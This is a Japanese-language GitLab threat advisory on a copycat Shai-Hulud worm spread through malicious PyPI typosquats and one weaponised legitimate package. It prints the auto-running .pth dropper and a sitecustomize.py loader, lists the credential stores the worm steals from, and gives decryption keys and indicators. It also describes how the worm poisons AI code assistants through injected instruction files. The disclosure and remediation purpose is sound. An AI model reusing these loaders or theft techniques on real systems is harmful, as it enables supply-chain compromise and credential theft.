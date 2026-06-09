GitLabの脆弱性リサーチチームは、PyPIを標的とした組織的なサプライチェーン攻撃を確認しました。この攻撃では、 Shai-Huludマルウェアのコピーが展開されています。悪意あるパッケージは5つ確認されており、Flask、Requests、NumPyを偽装したタイポスクワット4つと、武器化された正規プロジェクト1つが含まれます。これらのパッケージはインストール時にコードを実行し、インポートや関数呼び出しは不要です。また、自己増殖型の認証情報窃取ツールを内包しており、主要クラウドプロバイダー全般のCI/CD環境を標的としています。

GitLabが影響を受けるパッケージをいずれも使用していないことを確認しました。より広範なセキュリティコミュニティが適切に対応できるよう、調査結果を公開します。

攻撃の詳細

監視システムは、2026年6月7日、単一アカウント（ elitexp ）から公開された悪意ある5つのPyPIパッケージを検知しました。そのうち4つはタイポスクワットです。

rlask と tlask ：Flaskのタイポスクワット

と ：Flaskのタイポスクワット rsquests ：Requestsのタイポスクワット

：Requestsのタイポスクワット nhmpy ：NumPyのタイポスクワット

5つ目の mflux-streamlit は、実際のユーザーを持つ正規プロジェクトです。攻撃者はタイポスクワット展開後、悪意あるバージョン0.0.3および0.0.4を公開することで、このプロジェクトを武器化しました。

攻撃者はまず、本物の最新リリースのバージョン番号（Flask 3.1.3、Requests 2.34.2、NumPy 2.4.6）と完全に一致するクリーンな「プローブ」バージョンを公開しました。これらが問題なくインデックスされると、攻撃者はワームのペイロードを組み込んだ新しいバージョンを公開しました。

これは模倣による展開です。Shai-Huludの背後にある集団TeamPCPは、2026年5月12日にワームのコードを オープンソース化しました。以来、独立した攻撃者がこのツールキットを入手し、新たなターゲットを狙う動きを追跡してきました。今回のキャンペーンにより、同じワームがPythonエコシステムへも展開されました。

技術分析

初期感染ベクター

元のnpmバリアントは preinstall スクリプトを使用していました。このキャンペーンでは別のアプローチを採用し、Pythonの .pth ファイルメカニズムを悪用しています。Wheelパッケージは .pth ファイルを同梱でき、Pythonは起動時にこれを自動的に処理するため、明示的なインポートは不要です。各悪意あるパッケージには rlask-setup.pth のようなファイルが含まれており、1行のドロッパーが記述されています。

Copy import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(), ".bun_ran" ); _O.path.exists(_G) or exec ( 'import os as _o,subprocess as _s,urllib.request as _u...' )

ドロッパーはシステムの一時ディレクトリ内のマーカーファイル（ .bun_ran ）の存在を確認して再実行を防ぎ、次にGitHubからBun JavaScriptランタイムをダウンロードし、パッケージ内にバンドルされた5 MBの難読化されたJavaScriptペイロードを実行します。

rlask の初期バージョンには、バックアップの実行経路として sitecustomize.py ファイルも含まれていました。Pythonは起動時に sitecustomize を自動インポートし、このファイルは sys.path から隠し _index.js ペイロードを検索します。

Copy import subprocess, os, sys for d in sys.path: js = os.path.join(d, "_index.js" ) if os.path.exists(js): subprocess.run([ "node" , js]) break

攻撃者は後のバージョンでこのバックアップメカニズムを削除し、 .pth アプローチ単独で十分と判断したようです。

ペイロードの難読化

JavaScriptペイロードは3層で難読化されています。

整数配列に適用された ROT-N文字暗号（ローテーション値はパッケージによって異なります： [email protected] はROT-13、 rsquests はROT-17、 tlask はROT-25） ハードコードされた鍵を使用した AES-128-GCM暗号化（2つの暗号化ブロブを生成） 内部ペイロードへの標準的な 変数名マングリング（ _0x プレフィックス難読化）

コードを実行することなく、静的解析によってペイロードを復号しました。最初のブロブ（907バイト）はBunランタイムダウンローダーです。2番目のブロブ（772 KB）は完全なShai-Hulud認証情報窃取ツールで、2,538個のハードコードされた文字列を含んでいます。

独自に解析を行う研究者向けに、AES復号鍵を以下に示します。

レイヤー 鍵 IV Bunダウンローダー c95506221d18936328fbc7ddcd21e3dd 48da5faeafac0ac88a410bb0 ワームペイロード 7557c4e782a0622159476d1ea10d5236 55a7d25e0e61b77cc175bcc3

認証情報の収集

起動後、ワームは主要なクラウドおよびCI/CDプラットフォーム全般の認証情報を狙います。

GitHub Actions ： GITHUB_TOKEN 、パーソナルアクセストークン、きめ細かいトークン、OIDCトークン、組織・リポジトリのシークレット、Actionsアーティファクト、Runnerプロセスメモリ

： 、パーソナルアクセストークン、きめ細かいトークン、OIDCトークン、組織・リポジトリのシークレット、Actionsアーティファクト、Runnerプロセスメモリ AWS ：IAMアクセスキー、シークレットキー、セッショントークン、IMDSインスタンス認証情報（ 169[.]254[.]169[.]254 ）、Secrets Managerエントリ、SSMパラメータ、STS連携トークン

：IAMアクセスキー、シークレットキー、セッショントークン、IMDSインスタンス認証情報（ ）、Secrets Managerエントリ、SSMパラメータ、STS連携トークン Azure ：クライアントシークレット、マネージドIDトークン、Key Vaultシークレット、フェデレーテッド認証情報、Microsoft Graph APIトークン

：クライアントシークレット、マネージドIDトークン、Key Vaultシークレット、フェデレーテッド認証情報、Microsoft Graph APIトークン GCP ：サービスアカウントキー、アプリケーションデフォルト認証情報、クラウドプラットフォームスコープトークン

：サービスアカウントキー、アプリケーションデフォルト認証情報、クラウドプラットフォームスコープトークン HashiCorp Vault ：7つの既知のファイルシステムパス（ /var/run/secrets/vault-token 、 /etc/vault/token 、 /root/.vault-token など）からのVaultトークン、APIアクセス、Kubernetes Vault認証

：7つの既知のファイルシステムパス（ 、 、 など）からのVaultトークン、APIアクセス、Kubernetes Vault認証 npm / JFrog ：npmトークン、JFrog/Artifactory APIキー、OIDCトークン交換

：npmトークン、JFrog/Artifactory APIキー、OIDCトークン交換 PyPI ：公開トークン、OIDCミントトークン

：公開トークン、OIDCミントトークン RubyGems ：APIキー、gem公開認証情報

：APIキー、gem公開認証情報 SSH ：ラテラルムーブメントのための秘密鍵

：ラテラルムーブメントのための秘密鍵 Kubernetes ：サービスアカウントトークン、kubeconfigファイル

：サービスアカウントトークン、kubeconfigファイル Sigstore ：OIDCトークンとFulcio署名証明書（攻撃者が信頼されたIDでアーティファクトに署名可能になります）

：OIDCトークンとFulcio署名証明書（攻撃者が信頼されたIDでアーティファクトに署名可能になります） データベース：MongoDB、MySQL、PostgreSQL、Redisのパスワードが埋め込まれた接続文字列

自己増殖

元のnpmバリアントと同様に、これは単なる窃取ツールではありません。自己増殖します。窃取した認証情報を使用して、ワームは以下の動作を行います。

アクセス可能なGitHubリポジトリに .github/setup.js とワークフローファイルをコミットし、他のCIパイプラインでワームを再実行させます

とワークフローファイルをコミットし、他のCIパイプラインでワームを再実行させます .github/copilot-instructions.md を注入してAIコードアシスタントを汚染します

を注入してAIコードアシスタントを汚染します 窃取したレジストリトークンを使用して、PyPI、npm、RubyGemsに追加の汚染パッケージを公開します

sudoersルールを注入してセルフホスト型CIランナーへの権限昇格を試みます

StepSecurityのharden-runnerの存在を確認し、検出された場合は動作を変更します

攻撃者について

5つのパッケージはすべてPyPIアカウント elitexp が所有しています。このアカウントは2024年11月に正規パッケージ（ mflux-streamlit ：GitHubに11スターを持つStreamlit製画像生成UI）とともに作成されました。関連するGitHubアカウント（ github[.]com/elitexp ）は13年以上前に作成されており、大学のコースワークやLaravelプロジェクトを含む43の公開リポジトリを持っています。

アップロードメタデータによると、すべてのパッケージはユーザーエージェントとして Bun/1.3.14 を使用して公開されています。これはマルウェアが実行チェーンの一部としてダウンロードするランタイムと同じです。

攻撃者は mflux-streamlit 自体も武器化しました。バージョン0.0.1と0.0.2はクリーンですが、タイポスクワットキャンペーンの後、15:23と15:37 UTCに公開された バージョン0.0.3と0.0.4 には、同じ .pth ドロッパーと難読化されたペイロードが含まれています。これにより、典型的なタイポスクワットよりも危険な攻撃となっています。 mflux-streamlit は既存ユーザーを持つ実在のプロジェクトであり、これらのユーザーは通常の依存関係解決を通じて汚染されたアップデートを受け取る可能性があります。

侵害の痕跡

種別 インジケーター 説明 package rlask 3.1.4-3.1.7 悪意あるFlaskタイポスクワット package tlask 3.1.4 悪意あるFlaskタイポスクワット package rsquests 2.34.3 悪意あるRequestsタイポスクワット package nhmpy 2.4.7 悪意あるNumPyタイポスクワット package mflux-streamlit 0.0.3, 0.0.4 武器化された正規パッケージ file {package}-setup.pth 自動実行ドロッパー（SHA256: 6506d317... ） file sitecustomize.py バックアップ自動実行（ rlask のみ存在） file {package}/_index.js 難読化されたワームペイロード（5.2 MB） file .bun_ran システム一時ディレクトリ内の実行マーカー network hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip Bunランタイムのダウンロード network hxxps[://]upload[.]pypi[.]org/legacy/ ワームによる汚染PyPIパッケージの公開 network hxxp[://]169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/ AWS IMDS認証情報の窃取 network hxxps[://]login[.]microsoftonline[.]com/ Azure ADトークンの取得 network hxxps[://]fulcio[.]sigstore[.]dev Sigstore証明書のリクエスト actor elitexp (PyPI) パッケージ所有者 actor Bun/1.3.14 アップロード時のユーザーエージェント

影響を受けた場合の対処法

これらのパッケージのいずれかがお使いの環境にインストールされている場合：

パッケージを直ちに削除し、システムの一時ディレクトリ内の .bun_ran マーカーファイルを確認してください。 パッケージがインストールされた環境でアクセス可能だったすべての認証情報をローテーションしてください。CI/CDトークン、クラウドプロバイダーの認証情報、SSHキー、レジストリ公開トークンが含まれます。 GitHubリポジトリで予期しないコミット（特に .github/setup.js 、 .github/copilot-instructions.md 、または変更されたワークフローファイルに一致するもの）を監査してください。 パッケージレジストリアカウント（PyPI、npm、RubyGems）で公開していないパッケージがないか確認してください。 CI/CDパイプラインのログで予期しないBunのダウンロードやJavaScriptの実行がないか確認してください。

タイムライン

GitLabを活用したパッケージの検出方法

GitLab Ultimateをご利用の場合、 Dependency Scanningを使用して、プロジェクト内のこれらのパッケージへの露出を自動的に検出できます。 GitLab Advisory Databaseに、5つのパッケージすべてを対象とするアドバイザリ（GMS-2026-572〜GMS-2026-576）を申請しています。マージされると、Dependency Scanningが有効なプロジェクトのパイプライン結果と脆弱性レポートにこれらのパッケージがフラグ表示されます。

複数のリポジトリを管理するチームには、Security Analyst Agentを備えた GitLab Duo Chatを使用した迅速なトリアージをお勧めします。次のような質問を試してください。

「Shai-Hulud PyPIキャンペーンの影響を受けている依存関係はありますか？」

「このプロジェクトに悪意あるPython依存関係はありますか？」

今後の見通し

TeamPCPが5月にShai-Huludワームをオープンソース化した後、このキャンペーンを予測していました。独立した攻撃者がツールキットを入手し、新たなエコシステムに展開しています。Pythonバリアントは異なる初期感染ベクター（ preinstall スクリプトではなく .pth ファイル）を使用していますが、同じ認証情報収集および自己増殖のコードを内包しています。

監視システムはnpm、PyPI、その他のレジストリ全般での模倣展開を継続して追跡しています。新たな情報が入り次第、この記事を更新します。